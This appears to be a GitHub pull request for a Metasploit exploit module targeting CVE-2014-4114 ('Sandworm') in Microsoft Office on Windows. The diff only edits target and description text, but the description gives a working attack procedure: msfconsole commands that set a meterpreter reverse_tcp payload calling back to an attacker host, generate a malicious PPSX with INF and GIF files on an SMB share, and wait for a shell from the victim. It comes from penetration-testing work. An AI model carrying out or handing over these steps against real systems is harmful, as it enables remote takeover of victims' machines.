### PR TITLE
Add module for CVE-2014-4114, aka sandworm

### DIFF
--- a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
+++ b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'           => ARCH_X86,
       'Targets'        =>
         [
-          ['Windows 7 SP1 / Office 2013', {}],
+          ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}],
         ],
       'Privileged'     => false,
       'DisclosureDate' => "Oct 14 2014",

--- a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
+++ b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
@@ -19,9 +19,9 @@ class Metasploit3 < Msf::Exploit::Remote
         allowing arbitrary code execution, publicly known as "Sandworm". Platforms such as Windows
         Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be
         vulnerable. However, based on our testing, the most reliable setup is on Windows platforms
-        running Office 2013. And please keep in mind that some other setups such as using Office
-        2010 might be less stable, and sometimes may end up with a crash due to a failure in the
-        CPackage::CreateTempFileName function.
+        running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such
+        as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to
+        a failure in the CPackage::CreateTempFileName function.
 
         This module will generate three files: an INF, a GIF, and a PPSX file. You are required to
         set up a SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an


### PR DESCRIPTION
We have worked with @wchen-r7 on a fileformat module for the sandworm attack. Tested with windows 7 SP1 / Office 2013. ~~On our experience, expect a hard time when opening it with office 2010.~~

**Edit**: works smoothly on Office 2010 SP2, expect Office 2010 SP1 to crash.
## Verification
- [x]  Generate the files with the module. The UNCPATH must be the UNC Path where the payload and the malicious inf file will be stored (accessible for the target):

```
msf > use exploit/windows/fileformat/ms14_060_sandworm
msf exploit(ms14_060_sandworm) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms14_060_sandworm) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(ms14_060_sandworm) > set UNCPATH \\\\172.16.158.134\\public
UNCPATH => \\172.16.158.134\public
msf exploit(ms14_060_sandworm) > exploit

[*] Creating the EXE payload...
[*] Creating the INF file...
[*] Creating 'msf.ppsx' file ...
[+] msf.ppsx stored at /Users/jvazquez/.msf4/local/msf.ppsx
[+] Sggb.gif stored at /Users/jvazquez/.msf4/local/Sggb.gif, copy it to the remote share: \\172.16.158.134\public
[+] goPD.inf stored at /Users/jvazquez/.msf4/local/goPD.inf, copy it to the remote share: \\172.16.158.134\public
```
- [x] Send msf.ppsx to the target
- [x] Put JvMU.gif and CPVj.inf on the remote shared folder at \172.16.158.134\public (or whatever you have configured with UNCPATH)
- [x] Set a handler with the selected payload
- [x] Send the ppsx to your target and wait for a session on the handler
